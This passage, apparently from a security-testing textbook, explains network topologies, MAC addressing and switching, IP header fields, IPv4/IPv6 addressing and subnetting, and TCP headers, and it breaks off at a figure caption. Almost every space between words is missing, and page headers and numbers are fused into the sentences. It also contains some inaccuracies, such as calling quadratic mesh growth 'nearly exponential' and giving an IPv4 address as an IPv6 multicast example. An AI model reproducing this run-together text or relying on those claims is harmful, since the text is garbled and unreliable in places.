NetworkingFoundations■Andthisiswherethedifferentlayersarehelpful.Aswitch,whichisthemostcommondeviceinastarnetworktopology,actsatlayer2oftheOSImodel.ItusestheMACaddresstomakedecisionsaboutwheretrafficgoes.Inthecaseofastarnetworkwithahub,therearethesameissuesastherewouldbewithabusnetwork—­lotsofcollisionswheremessagessentoutonthewirerunoverothermessagessentbysomeoneelse.Aswitchalleviatesthoseissuesbecauseonlytrafficaddressedtoasystemgetssenttothatsystem.RingNetworkAringnetworkissimilartoabusnetworkinthesensethatallofthenodesonthenetworkappeartobeconnectedonacontiguousnetworksegment.Trafficpassesaroundtheringfromsystemtosystem.YoucanseealogicalrepresentationinFigure 2.6.Thereasonit’salogicalrepresentationisbecausephysically,thisisnothowthesenetworksarewired.Onetypeofringnetworkisatokenring.Inatokenringnetwork,systemsarewiredasthoughtheyareinastar,usingmultistationaccessunits(MAUs).Whiletheyarewiredthatway,theydon’tbehavelikeastar.Thisiswhereyoushouldrememberthattheseareconceptualmodels.Thebehavior,regardlessofthewiring,ishowthetopologiesarenamed.FIGURE 2.6 RingnetworkJustaswithabusnetwork,thereisaproblemwithcollisions.Atokenringnetworkavoidsthisproblembyusingatalkingstick.Justaswhenyouaresittingaroundacampfireinanaboriginaltribe,whereonlythepersonwiththestickgetstotalk,atokenringnetworkusesadigitalrepresentationofthetalkingstickcalledatoken.Onlythesystemthathasthetokengetstotalk.Ifthereisnosystemthatneedstosendamessage,thetokengetspassedfromsystemtosystem.Whenasystemneedstotalk,ithastowaitforthetokentogetpassedaroundtoit.Thiswilltheoreticallyavoidtheproblemwithcollisionsexceptthatsometimesthetokengetslost,whichmeansanewtokenhastogetgenerated.AfterthenewTopologies 25tokengetsgenerated,it’spossiblefortheoldtokentosuddenlyget“found”again,meaningtherearetwotokensonthenetwork.Inspiteofaringnetworkbehavinglikeabusnetwork,thereisn’taneedforterminatorsasthereisinabusnetwork.Thehardwarenecessarytohavethenetworkfunctionasthoughitwereinaringconfigurationtakescareoftheproblemofechoesbacktothewire.MeshNetworkInanothertopology,systemsarewireddirectlytooneanother.Figure 2.7showsanexample.Thislooksalittleasthoughtheyarewiredinaring,butit’smorelikepeertopeer.Togetfromonesystemtoanother,iftheyarenotwiredtogetherdirectly,asystemhastopassthroughanothersystem.Meshnetworkswilltypicallyavoidanotherpotentialproblemwithabusnetwork.Ifasysteminthemiddleofthebusnetworkfails,thereisapotentialfortheentirenetworktofailalongwithit.Thesystemessentiallyactslikeaterminatorbynotallowingtheelectricalsignaltopassthroughit.Ifasysteminameshnetworkfails,thereisprobablyanotherpathwaytogetbetweenonesystemandanother.FIGURE 2.7 MeshnetworkWhileyoucanconnectsystemstogetherinmultiplewaysinameshnetwork,inspiteoftheorderlinessthatthecirculardesignofthenetworkshows,acoupleoffailurescanpotentiallyisolatenodesinameshnetwork.Thewayaroundthatistoaddconnections.Themorepathwaystogetfromonesystemtoanother,thelesschancefailurewillbecatastrophic,meaningcommunicationdoesn’thappen.Youcankeepaddingconnectionsuntil26 Chapter2  NetworkingFoundations■everysystemhasconnectionstoeveryothersystemonthenetwork.YoucanseeanexampleofthistypeofdesigninFigure 2.8.Whatyouseeinthediagramiswhat’scalledafullmeshnetwork.Everysysteminthenetworkhasaconnectiontoeveryothersystem.FIGURE 2.8 FullmeshnetworkTheproblemwithaddingmoreconnectionsistheresultingcomplexity.Youcanseealittleofthat.Diagrammingitmakesithardtoseewherealltheconnectionsare.Everytimeyouaddanodetothenetwork,youdon’tjustaddasingleconnection.Youaddthesamenumberofconnectionsasyouhaveexistingnodes,soyourconnectionsincreasenearlyexponentially.Infact,todeterminethenumberofconnectionsyouhave,youcanusetheformulan(n–1)/2.Everysystemhasaconnectiontoeveryothersystemexceptitself,whichiswhywemultiplythenumberofsystemsbyonelessthanthenumberofsystems.(Forexample,ifyouhad5systems,theformulawouldlooklike5(5–1)/2.Thatwouldbe5*4,whichis20,dividedby2,givingyou10connections.)Wedivideby2becausewearen’tgoinginbothdirectionsfromonesystemtoanother.Weneedonlyasingleconnection.HybridEachoftheprevioustopologiesisgood,giventherightcircumstances.However,therearecircumstanceswhereblendingmultiplenetworktopologiesistherightwaytogoaboutconnectingyournetwork.Onecommonhybridapproachisthestar-­bus.Ifyouhaveswitchescapableof64 networkconnectionsbutyouhave200usersthatyouneedtoconnecttoyourPhysicalNetworking 27localnetwork,youwouldneedtoaddabusintoyournetworktopology.Thebuswouldconnectallofyourswitchestogetherandbecomeabackboneforyournetwork.Thenfromeachswitch,youhavethetraditionalstarwherealltheconnectionscomebacktotheswitchtheyareconnectedto.Similarly,itmaybehelpfultoconnectyourswitchinginfrastructureineitherameshoraring.Thismaybeforredundancypurposes,toensuremultiplepathwaystogettoallofyournetwork.Ifeverythingwasinabusandthebusfailed,somenetworksegmentsmaybeisolated.Asaresult,settingupyournetworkwithmultiplepathwayscanmakealotofsense.Ameshnetworkoraringnetworkmayhelpwiththat.PhysicalNetworkingAtsomepoint,youneedtoconnecttothenetwork.Therearemultiplecomponentstothatinteraction.Youneedanetworkinterfaceonyourend.Youneedamediumthatisgoingtocarrythecommunication.Youneedtohavesomethingontheotherendofthecommunication.Becausewearen’tlikelygoingtobeworkingatserviceprovidersortelecommunicationsprovidersaswearedoingsecuritytesting,atleastnotontheprovidersideofthenetwork,wearen’tgoingtoworryaboutprotocolslikeFrameRelay,AsynchronousTransferMode,orFiberDistributedDataInterface.TheprotocolyouwillalmostexclusivelyrunacrosswhenwearetalkingaboutphysicalnetworkingisEthernet.Eachlayerofthenetworkstackhasadifferenttermtorefertothechunkofdataencapsulatedbythatlayer.Thesechunksarecalledprotocoldataunits(PDUs).ThePDUatlayer 2,whichisapartofwhatwearetalkingabouthere,isaframe.Whenyouarelookingatachunkofdatawiththephysicaladdressinit,youarelookingataframe.We’lltalkaboutthenamesoftheotherPDUswhenwegettothoselayers.AddressingEthernetinterfacesallhaveaddresses.Theseaddressesareexclusivetoeachnetworkinterface,andtheyarecalledMACaddresses.BecausetheMACaddressishard-­codedintothehardwareoftheinterface,itissometimesreferredtoasthehardwareaddress.Sinceit’salsotheaddressthatisusedbyaphysicalpieceofhardware,itissometimesreferredtoasaphysicaladdress.ThecommonformatofaMACaddressis6octets(8-­bitbytes)generallyseparatedbycolons.AnexampleofaMACaddresswouldbeBA:00:4C:78:57:00.Theaddressisbrokenintotwoparts.Thefirstistheorganizationallyuniqueidentifier(OUI).ThisisalsocalledthevendorIDbecauseitidentifiesthenameofthecompanythatmanufacturedtheinterface.ThesecondhalfoftheMACaddressistheuniqueaddresswithinthevendorIDofthatinterface.So,halfisforthevendor,andhalfisforthecarditself.28 Chapter2  NetworkingFoundations■MACAddressesTheMACaddressisrepresentedinhexadecimalvaluesbecauseit’sacommonwaytorepresentoctets.Apairofhexadecimalvaluescoverstherangeofpotentialvaluesofabyte—­00is0,andffis255.YoumayalsorunintothiswhenlookingatIPaddressesandcertainlyanytimeyoudoahexadecimaldump.TheMACaddressisusedexclusivelyonyourlocalnetwork.AnysystemthatwantstosendyouanythingwilladdressittoyourMACaddress.Youcanalsosendmessagestoeverydeviceonthenetworkbyusingthebroadcastaddress.ThebroadcastMACaddressisff:ff:ff:ff:ff:ff.Yournetworkinterfaceknowswhataddressithas,becauseit’sinthehardware.Whatthismeans,though,isthattrafficthatisinsomewayaddressedtotheinterface,eitherdirectlytoitsaddressortothebroadcastaddress,forexample,willgetforwardeduptotheoperatingsystemfromthenetworkinterface.Everythingelsewillgetignored,unlesstheinterfaceistoldspecificallynottoignoreit.Thiswouldbeanunusualcase,thoughitisnecessaryforpacketcaptures.SwitchingMACaddressesarethecornerstoneforswitching.Switchingiswhathappenswhendecisionsaboutforwardingmessagesaremadebasedonthephysicaladdress.Aswitchisreallyamultiportbridge.TrafficisforwardedfromoneinterfacetoanotherbasedonwhatthedestinationMACaddressis.Thisdoes,though,meanthattheswitchneedstoknowwhatMACaddresslivesatwhichport.Itdoesthisbywaitinguntilamessagecomesinoneachportandnoticesthesourceaddress.Becausehavingtoperformalookupofwhichporttoforwardamessagetotakestime,whichwillslowdownmessagetransmission,it’sessentialthatthelookupbeasfastaspossible.Thisisgenerallyaccomplishedthroughtheuseofsomethingcalledcontent-­addressablememory(CAM).Thismeansthattolookupavalue,yousearchforitbasedonanothervalue.Insteadofanarrayofdataindexedwithnumericvalues,meaningwelookupavaluebyusingsomethinglikearray[5]togetthevalueatindex5 inthearray,weuseaMACaddressastheindexvalue.Thismeansthatyouneedtosearchthroughallthedataorkeepitsortedinordertofindanything.Thisistime-­consuming.It’seasiertolookupaportvaluebyjustindexingtotheMACaddress.Whataswitchdoes,whichisthevalueofswitching,ismakedeterminationsaboutwhattrafficgoestowhichportbasedonthedestinationMACaddress.Thisreducestheamountoftrafficgoingouttheswitchportanddownthewire.Thisimprovesperformancebecauseyoucanfillthenetworkconnectionwithtrafficspecifictothesystemconnectedtotheswitchportratherthanfloodingitwithalltheothertrafficonthenetwork.Thisdoescausesomeotherproblems,though,whenitcomestosecuritytesting.Inaswitchedenvironment,youonlyseetrafficmeantforthatsystemconnectedtotheswitchport.Whenperformingsecuritytesting,actinglikeanattacker,it’smoreconvenienttobeabletoseemoretrafficthanthat.IP 29Therearesomewaysaroundthatchallenge.Oneofthem,ifyouhavesomecontrolovertheswitch,istotelltheswitchtomirrortrafficononeporttoanotherport.Then,youneedtohavethesystemyouarerunningattacksfromattachedtothemirrorport.Anotherwayistofooltheswitchintosendingtraffictoyou,whichinvolvesmethodsofattackthatwe’llcoverinlaterchapters.IPMovingintotheNetworklayer,werunacrossIP.CertainlythereareotherprotocolsthatexistattheNetworklayer,suchastheInternetPacketExchange(IPX),butastheInternetrunsonIPanditsassociatedprotocols,we’llfocusthere.Sofar,wehaven’ttalkedmuchaboutheaders.Aseachlayerispassedthrough,asetofdataisaddedtothemessagethatisspecifictotheprotocolprocessingthemessage.Thissetofdataiscalledheaders.Eachprotocolhasitsownsetofheadersthatgetattached.Themessageisthenencapsulatedbytheheaders,creatinganentirelynewPDU.ForIP,thePDUiscalledapacket.Youmayheareverysetofdataonthenetworkreferredtoasapacket,butfromatechnicalstandpoint,amessagefromtheIPheaderdownisapacket.Addressingissomethingtoconsider,aswell.Thisisanaspectthatpeoplewhoworkwithnetworkingareoftenfairlyfamiliarwith,butit’susefultounderstandwhatanaddresscomprises.Associatedwiththeaddressisthesubnetmask.Thiscanbechallengingtounderstand,buttherearesomemathematicaltricksthatcanhelp,onceyouknowthem.Therearealsoacoupleofdifferentwaystorenderthesubnetmask,andyou’lloftenrunacrossbothofthem.TherearecurrentlytwoversionsofIPinuse.Theonethatismostcommonisversion4,commonlydesignatedasIPv4.We’vebeenintheprocessofswitchingovertoversion6forthelastcoupleofdecades.Ithasn’thappenedyet,buteverymoderndeviceandoperatingsystemsupportsIPv6,soyouwillseetheIPv6addressonmostsystemsyouwillinteractwith.IPv6 hassomedifferencesoverIPv4,nottheleastofwhichisthesizeoftheaddressspace.IPisconsideredabest-­effortprotocol.Itdoesitsbesttogetpacketsfromthesourcetothedestination.Itdoesnothingtoabsolutelyensurethattheygetthere.Itdoesfacilitatethetransmission,however,byprovidingaddressing.HeadersTheInternetEngineeringTaskForce(IETF)isresponsibleformaintainingallofthedocumentationrelatedtoprotocols.Whensomeone,ormorecommonlyagroupofpeople,wantstoproposeanewprotocoloranextensiontoanexistingprotocol,theywritesomethingcalledarequestforcomments(RFC)document.TheIETFnotonlymaintainstheRFCs,butitalsomanagestheprocessofgettingthemapproved.ThefirstRFCwaswrittenin1969andwasrelatedtothehostsoftwarefortheIMPthatwasusedtointerfaceacomputersystemtotheARPAnet.Atthetime,ofcourse,theIETFdidn’texist,butusingRFCswasstilltheprocessforcreatingspecificationsandstandards.30 Chapter2  NetworkingFoundations■TheRFCforIP,whichwaspublishedin1981,is791.ItdefineshowIPissupposedtoworkandalsodefinestheheaderfieldsusedbyIP.Figure 2.9showsasetofIPheadersfromamessagecapturedoffthenetwork.ThisisthesamesetofheadersthatwouldbepresentedintheformofatableintheRFCreferenced.Thedifferencebetweenthetableformandjustlookingattheheadersinthiswayisthatwiththetable,youcanclearlyseethesizeofeachheaderfield.FIGURE 2.9 IPheadersThefollowingaretheheaderfieldswiththeirdescriptionsandsizes:Version  ThisfieldindicateswhichversionofIPisinthispacket.Thisisa4-­bitfield.HeaderLength  ThisfieldindicateshowmanywordsareintheIPheader.Becausetheheaderisbasedon32-­bitwords,whichis4bytes,youcangetthenumberofbytesbymultiplyingthisvalueby4.Inthecaseofthisexample,you’llfindthattheheadersare20bytes(fivewords),whichiscommonforanIPheader.Typeof Service  TheRFCcallsthisthetypeofservice(ToS)field,thoughyou’llalsoseeitreferredtoasthedifferentiatedservicesfield.Thisfieldhelpsnetworkelementsmakequalityofservice(QoS)decisionsbyprioritizingsomemessagesanddeprioritizingothers.Thisisan8-­bit(1-­byte)field.TotalLength  Thisisthetotallengthofthemessage,includingtheIPheaderandanysubsequentdata.Thisdoesnotincludeanyheaderthatgetsaddedonafterthefact,likethelayer2header.Thisfieldis2byteslong,whichallowsforatotalmessagelengthof65,535octets(bytes).Identification  Sometimesthereistoomuchdatabeingsenttofitintothemaximumlengthallowedbasedonthesizeofthelengthfield.Thismeansthemessagessometimesneedtobefragmented.Allmessagessentgetthisfieldset,thoughitonlymeansanythingiftherearefragments.Allfragmentswillhavethesameidentificationvalue.Flags  Thereare3bitsallocatedtoaflagsfield.Oneisreserved,andthesecondindicateswhetherthemessagecanbefragmented.ThisissometimescalledtheDFbit.Ifit’sset,itmeansdon’tfragmentthemessage.ThelastbitisusedtoindicatewhetherthereIP 31areadditionalfragments.Ifit’sset,therearemorefragments.Ifitisunset(meaning0),it’sthelastfragment.Amessagethatisself-­contained,meaningitdidn’trequireanyfragmenting,wouldhavethisbitclear.FragmentOffset  Thefragmentoffsetfield,13bitslong,indicateswherethedatainthepacket aligns.Thisletsthereceivingsystemknowhowtostitchallthefragmentstogether.Thevalueinthisfieldisindoublewords,or8octets(bytes).Timeto Live  Thetimetolive(TTL)fieldindicateshowlongamessagecanliveonthenetworkbeforeitisconsideredtobeexpired.Itismeanttobemeasuredinseconds,thougheverynetworkdevicethattouchesthemessagemustdecrementthisfield.Sincethepacketmaypassthroughmultiplenetworkdevicesinasecond,theinitialdefinitionofthisfieldisn’trelevantanymore,andtheTTLreallyindicatesthenumberofnetworkdevices(routingdevices,essentially)themessagecanpassthrough.Oncethefieldhits0,themessageisdiscarded,andanerrormessageisreturnedtothesender.Thisfieldis8bitslong.Protocol  Thisisanumericvalueindicatingwhatthenextprotocolis.Itisan8-­bitfieldandtellsthereceivingsystemwhatheaderstolookforinthetransportheader.InthecaseofthepacketinFigure 2.9,thevalueis17,whichmeansit’saUDPmessage.Checksum  Thisisa16-­bitvaluethatisusedtodeterminewhethertheheaderisintact.Itisdefinedasa1’scomplementsumofthe16-­bitwordsintheheader.SourceAddress  ThisistheIPaddressthatsentthemessage.Itis4octetsinlength.DestinationAddress ThisistheIPaddressthatthemessageisgoingto.Itisalso4octetsinlength.Octetsvs.BytesYouwillsometimesseethetermoctetused,andyoumaybewonderingwhyweusethetermoctetsinsteadofbytessincewhatwearereferringtoisavaluethatis8bitsinlength.ThereasonisthattheRFCswerewrittentobeimplementedonanysystem.Whentheseprotocolsweredefined,abytewasn’talways8bits.Somebyteswere10bits,otherswere12,andsomewere8.Tobeveryclear,thewordbytewasn’tused.Instead,avaluethatwas8bitswasanoctet.Ifthewordoctetisused,thereisnoconfusion.AddressingIPversion4addressesare4octetslong.Theyarecommonlyshownasbeingseparatedbyaperiod(.).Becauseofthis,theyaresometimesreferredtoasdottedquads.Sinceeachvalueis8bits,therearepotentialvaluesof0to255.Notallvalues,especiallyinthefirsttwo32 Chapter2  NetworkingFoundations■octets,areused,however.Therearesomeaddressesthatareheldinreserve,forvariousreasons.Forastart,theaddressrange127.0.0.0–127.255.255.255isreservedforloopbackaddresses.Theseareaddressesthatrefertothehosttheyareassignedto.Theloopbackinterfaceensuresthereisalwaysanetworkinterfaceonthesystemandallowsfortestingoveranetworkwithoutsendinganytrafficoutsidethesystem.Commonly,theloopbackaddressonsystemsis127.0.0.1,thoughanyaddressinthatrangecouldbeused.RFC1918alsocarvesoutrangesofIPaddressesthatareusedforprivatenetworks.Byconvention,theseaddressesarenotroutableovertheInternet.Mostnetworkswilldosomethingtoblocksourceaddressesfromtheserangescomingintotheirspace,sincetheyshouldneverbeoriginatingfromtheoutsideofanetwork.Therangesfortheseprivateaddresses,meanttobeusedbyanynetworkthatdoesn’thavepublicIPaddresses,are10.0.0.0–10.255.255.255,172.16.0.0–172.31.255.255,and192.168.0.0–192.168.255.255.Additionally,otheraddressrangesareheldinreserve.Therange224.0.0.0through239.255.255.255isusedformulticastmessages.Anythingabove240.0.0.0isalsoreservedandisnotcurrentlyinuse.OneofthereasonsformovingtoIPv6isthelimitationonaddresseswithversion4.Thereareapproximately4billionaddressesavailablewithIPv4.Thisincludestheentiresetofaddresses,though.Outofthat,welopoff16 millionrightawayjustbecauseofthe10.0.0.0privateaddressblock.Then,wetakeawaymorethan268 millionbecauseoftheaddresseshigherthan240.0.0.0.YoucanseehowquicklyaddressspaceinIPv4disappears.YoumayalsohavenoticedthatthenumberofdevicesthatareconnectingtotheInternetisincreasingatanearlyexponentialrate.Thestopgapforthisistouseprivateaddressrangesontheinsideofnetworks,especiallyhomenetworks.Insteadofjust4octetsthatareusedinIPv4,IPv6uses16bytes.BecauseitwouldbeawkwardtowriteanIPv6 indottedoctetformaswedowithIPv4,addressesinIPv6arewritteninadifferentform.Becauseanoctetcanberepresentedwithtwohexadecimaldigits,youwillseeIPv6addressesrepresentedinthatway.Itsavesspaceandtyping.Sincethereare16octetsinanIPv6address,thelongestaddressyouwillrunacrosswillbe32characters.However,thecompleteaddressisgenerallyseparatedintobytepairswithacolon(:)between.Asanexample,oneofmysystemshasanIPv6addressoffe80::62e3:5ec3:3e06:daa2.Inadditiontotheaddressbeingbrokenupintobytepairs,likefe80,you’llnoticethereisapartoftheaddressthathasacolonpairwithnothinginbetween.Thisisnotamistake.Thisisashorthandtoindicatethatwhatisinthemiddleisall0s.Thecompleteaddresswouldbefe80:0000:0000:0000:62e3:5ec3:3e06:daa2.It’seasiertodroptheextra0sout.IPv6 hasthreedifferentaddresstypes.Thefirstisunicast,whichreferstoasinglesystem.Anycastaddressesaregroupsofsystemsthatshareasingleaddress.Amessagesenttotheanycastaddresswillbedeliveredtojustoneofthehostsintheanycastgroup.Thiswillcommonlybetheclosestaddress,basedonroutingrules.Anyanycastaddresswillhavethesameformatasaunicastaddress.Multicastaddresseswilllookliketheotheraddresses,buttheyareformattedbasedonthefactthattheyaremulticastaddressesandontheapplicationthatisusingtheaddress.Youmayseeamulticastaddresslike224.0.0.1,forexample.IP 33SubnetsSubnettingcanbeachallengetounderstand,butit’sanimportantconcept.Oneofthereasonsit’simportantisthatyoumayneedtoknowwhataddressesbelongtoyourtargetbasedonasubnet.Ifyoudon’tgetthesubnetboundariescorrect,thereisachancethatyouwillstarttestingagainstsystemsthatdon’tbelongtoyourtarget.Thiscangetyouintoalotoftrouble.Becauseofthat,we’llspendalittletimeheretalkingaboutwhatsubnetsareandhowtodeterminetheboundariesofsubnets.Thiswillinvolvesomesimplemath,butideallyitwillbeeasyonceit’sexplainedtoyou.IPaddressesareaggregatedintonetworksusingcontiguousaddresses.Thisisrelevantnomatterwhetherwe’retalkingaboutIPv4orIPv6.Thismakesroutingtothoseaddresseseasiersinceroutingtablesdon’thavetokeeptrackofeverysingleIPaddress.Instead,theaggregateblocksaretracked.Inpartbecauseofthis,apartoftheIPaddressbelongstothehostandpartbelongstothenetwork.Thissegmentationoftheaddressalsohelpssystemstoknowwhataddressesarelocal,meaningthecommunicationsstayonthelocalnetwork.ThewaysystemsaretoldwhatarelocalnetworksandwhatarenotlocalnetworksisthatasubnetmaskispairedwiththeIPaddress.Thesubnetmaskisalso32bitsinlengthandrepresentedasadottedquad.TodeterminewhatportionofanIPaddressbelongstothenetwork,youlookatthebitsthataresetto1 inthesubnetmask.Tobetterunderstandthisconcept,let’stakealookatabinaryrepresentationofasubnetmask.11111111.11111111.11111111.10000000Anybitpositionthathasa1 initispartofthenetworksegment.You’llnoticethatthe1sarefilledinfromtheleftandtherearenogaps.Asaresult,subnetmaskscanhaveonlycertainvalues:0,128,192,224,240,248,252,254,and255.Thisisbecauseeverypositionisapoweroftwoandweaddonfromthemostsignificantbitontheleftside.Thebinary10000000 equals128 indecimal.11000000is192.Everytimewesetabitto1,weaddonthenextlowerpowerof2.Lookingatthesubnetmaskaboveandapplyingbinarytodecimaltranslation,wecanseethatthesubnetmaskis255.255.255.128.Thismeansthatonlythelast7bitsofthelastoctetareusedforhostvalues.Thebitrepresentationinthelastoctetwouldbe10000000.ThisiswhereweneedtostartapplyingtheIPaddresstothesubnetmasktogettheaddressrange.Withasubnetmaskof255.255.255.128,Ihavethepossibilityoftwoaddressblocks,regardlessofwhattheIPaddressis.Icanonlyvarythelastoctet,andIamconstrainedbecauseIcan’tchangethevalueinthemostsignificantbitposition.Thisleavesmewiththerangesof0–127and128–255.OnceIknowwhatmyIPaddressis,IknowwhichblockIamin.Let’ssaymyIPaddressis172.20.30.42,andmynetmaskis255.255.255.128.Iknowmyaddressblockhastobe172.20.30.0–127becausethat’stherangethat.42 landsin.AnotherwayofdesignatingnetworkblocksisusingClasslessInterdomainRouting(CIDR)notation.Thismeansthatratherthanindicatingasubnetmask,youonlygetthe34 Chapter2  NetworkingFoundations■numberofprefixbits.Theprefixtellsyouwhichbitsarebeingusedforthenetwork.Thesubnetmaskusedabovetranslatesto/25,andIwouldindicatethesubnetwiththeIPaddressbyindicating172.20.30.42/25.Usingthisnotationactuallymakeslifealittleeasierifyouthinkaboutitinpowersoftwo.Let’ssayyouwanttoknowhowmanyaddressesbelongtoaparticularnetworkblockandyouhavetheCIDRnotation.Onewaytomakethatdeterminationistostartwithaknownquantity.Often,youwillseeCIDRnotationshoveringaroundthe/24area,whichisa255.255.255.0subnetmaskandiscommon.Ifyouwanttoknowhowmanyhosts,youjustdivideby2ormultiplyby2foreverybitchangeintheprefix.Anetworkthatisa/24 has256possiblevaluesinthehostportion(thelastoctet).Ifyougotoa/25,thatmeansyouget128possiblevalues(divideby2becauseyouaddedaprefixbit,meaningyoulostahostbit).Ifyougotheotherdirectiontoa/23,youdoublebecauseyoulostaprefixbit,meaningitgotaddedtothehostportion.Insteadof256,younowhave512possiblevaluesinthehostportion.Youcanalsoseeprettyquicklyhowtogetevensmallerprefixvaluesjustbylookingatthenumberofbitsineachoctet.Ifthefirstoctetisusedforthenetworkdesignationandallothersareusedforthehostvalues,youwouldhaveallthebitpositionsinthatfirstbytefilledup,whichmeansyouareusing8bits,leavingyouwithaCIDRdesignationof/8.Similarly,ifyouusethefirsttwooctets,youareusing16bits,soyouhavea/16.Onenoteaboutsubnets,though,isthattherearetwovaluesthatcan’tbeusedforsystems.Thelowestpossibleaddressinanynetworksegmentisusedforthenetwork.Thehighestpossibleaddressinanynetworksegmentisusedforthebroadcastaddress.Inacommon/24 network,the.0becomesthenetworkaddress,andthe.255isusedforthebroadcast.Neitherofthesecanbeallocatedforhosts.IPv6 makesthewholeprocesseveneasier.Therearenosubnetmasksusedanylonger.Instead,CIDRdesignationisusedexclusivelytoindicatewhichpartisnetworkandwhichishost.Thesamerulesapply.Thenetworkportionalwaysstartsfromtheleft,andwefillinbitsofthemaskfromtheleft.A/50 networkmeansthatthefirst50bitsoftheaddressarethenetworkdesignation.Thisleavestheremaining78bits(keepinmindthatIPv6addressesare128bitslong)forthehost.Thatwouldbeanincrediblylargenetwork,ofcourse.TCPMovingtotheTransportlayer,wefirstrunacrosstheTCP.WhereIPisabest-­effortprotocol,meaningthatabesteffortismadetogetmessagesfromonesystemtoanother,TCPissaidtohaveguaranteeddelivery.Thisislessimpressive,perhaps,thanitsounds.Obviously,TCPbyitselfcan’tensuredeliveryinthecaseofcatastrophicfailureinthenetwork.Instead,whatitmeansistherearemechanismsintheprotocolthatkeeptrackofallofthemessagesthataresent,andifsomethingdoesn’tgettotheotherendandacknowledgedthere,messageswillbere-­sent.TCP 35TheprotocoldataunitforTCPiscalledasegment.Thelayerswehavelookedatsofarhaveformsofaddressing.TheTransportlayerisnodifferent.Wherepreviousaddressesarerelatedtothesystemstoensuremessagesgetfromonesystemtoanother,attheTransportlayer,westarttobecomeconcernedaboutgettingmessagestotheapplication.Transportlayerprotocolsprovideportsasawayofaddressingapplications.Theyalsoprovidemultiplexing.Withoutports,wewouldn’tbeabletohavemultipleapplicationslisteningonthesamesystem.Withports,wehavealargecapacityforconversationswithothersystems.JustaswedidwithIP,we’regoingtotakealookattheheadersthataredefinedforTCP.TCPisdefinedinRFC793,anditwasalsowrittenin1981,whichmeansTCPhasbeenaroundforalongtime.Theheadersremainunchangedinallthattime,andsincetheheadersenablethefunctionalityoftheprotocol,thefunctionalityhasn’tchangedeither.Figure 2.10showstheTCPheadersfromapacketcapture.FIGURE 2.10 TCPheadersYouwillseethefollowingfieldsinthecapture:SourcePort  Thesourceportistheportthatthetrafficoriginatedfromonthesendingside.Thisisimportantbecauseconversationsarenotone-­way.Fortherecipienttobeabletorespond,itneedsaporttosendbackto.Whenmessagesarerespondedto,thesourceanddestinationportsarereversed.Thesourceportis16bitsinlength.36 Chapter2  NetworkingFoundations■DestinationPort  Thedestinationportistheonethatisassociatedwithanapplication.Everyconversationhasaclientsideandaserverside.Theserversidebindsanapplicationtoalisteningport.Theclientsendstothisportasthedestinationport.Iftheserverissendingfromtheservertotheclient,thedestinationportistheephemeralportassignedtotheapplicationthatiscommunicatingwiththeserver.Thedestinationport,likethesourceport,is16bitsinlength.SequenceNumber  Thesequencenumberispartofwhatcontributestotheguaranteeddelivery.Thisisa32-­bitnumberthatissettoarandomvaluewhentheconversationisinitiated.Itisincrementedwiththenumberofbytesthataresent.Usingthesequencenumber,thesendertellstherecipientwhereintheconversationthismessagefalls.You’llseeintheexamplethatthesequencenumbershowsas0.Thereasonforthisisthatthepacketcapturesoftwareshowsa0andthenpresentsrelativesequencenumbers,whichareeasiertofollow.AcknowledgmentNumber  Theacknowledgmentnumberistheoppositesideoftheconversationfromthesequencenumber.Wherethesequencenumberissetfromthesender,theacknowledgmentnumberissetfromtherecipient.Theacknowledgmentnumberissettothenextbytenumbertherecipientexpectstoreceive.Whatthismeansinpracticeisthatthebytecountisincrementedby1andthensent.Thistellsthesenderwhereinthecommunicationstreamtherecipientis,whichletsthesenderknowwhetheranythinghasbeenlostintransmission.DataOffset  Thedataoffsetisa4-­bitvalueindicatingthenumberof32-­bitwordsintheTCPheader.Itletsthesystemknowwheretolookforthedata.ThisisnecessarybecausetheTCPheadercanbevariablelength.Thisfieldisn’tshowninthefigure,butitisadefinedTCPheader.Reserved  Thereare6bitsintheTCPheaderthatarereservedforfutureuse.ControlBits  Thereare6flagbitsthatareusedtoindicatedispositionofthemessage.TheSYNflagisthesynchronizeflag,indicatingthatthesequencenumberissetandshouldberecorded.TheACKflagisthesamefortheacknowledgmentnumber.TheURGflagindicatesthattheurgentpointerhasdatathatissignificant.ThePSHflagisanindicationthatthedatashouldbepushedupratherthanbeingbuffered.TheRSTflagresetstheconnection,whichmayhappenifamessageisreceivedthatappearstobeinerror.TheFINflagindicatesthattheconversationisoverandthereisnomoredatatosend.Window  Thevalueinthewindowfieldtellstherecipienthowmanybytesthesenderiswillingtoaccept.Thisallowsforspeedingupandslowingdownthecommunication.Asmallerwindowsizemeansmoreacknowledgmentsarenecessary,whichmaybeanindicationthatthecommunicationchannelisn’treliable.Alargerwindowsizemeansthechannelisreliablesothereisn’tasmuchneedtokeepcheckingin.Thewindowfieldis16bits.TCP 37Checksum  Thisisa16-­bitfieldusedtoensurethatthecommunicationhasn’tbeencorrupted.Thisisa1’scomplementvaluecalculatedovertheheadersandthetext.UrgentPointer  The16-­biturgentpointerindicatesthenextbytevalueaftertheurgentdata.Thisalignswiththesequencenumbervalues.Essentially,theurgentpointersaysthedatafromthecurrentsequencenumberupuntilthevalueintheurgentpointerisurgentdata.Options  Thesearevariablelengthheaderfields.Theheadermustalignon32-­bitwords.Iftheoptionsleavetheheaderlengthshortofthatalignment,paddingbitsarenecessarytofilltheremainderoftheheader.TCPusesmultiplemechanismstoensureareliableservice.ThefirstisthatTCPisconnection-­oriented.Connectionsareestablishedusingwhatiscalledathree-­wayhandshake.Figure 2.11showsadiagramofthehandshakeprocess.Thehandshakeensuresthatbothsidesoftheconversationareliveandactivebecausetheyareexpectedtorespond.Thefirstmessageinthethree-­wayhandshakeistheSYNmessage.TheSYNflagisset,aswellastheinitialsequencenumber,whichisarandomvalue.TheresponsetotheSYNmessageisanacknowledgmentmessage.ThissetstheACKflagandincrementstheinitialsequencenumberbyone,indicatingthefirstmessagewasreceived.Inthesamesegment,theSYNflagandsequencenumberarealsoset.Keepinmindthattheconversationistwo-­way,sobothsideshavetokeeptrackofwheretheyareintheconversation.Eachsidekeepstrackofasequencenumberfortheirsideandanacknowledgmentnumberfortheotherside.ThefinalmessageinthehandshakeisonethatjusthastheACKflagset,andtheacknowledgmentfieldincrementsthesequencenumbersetintheSYN/ACKmessage.FIGURE 2.11 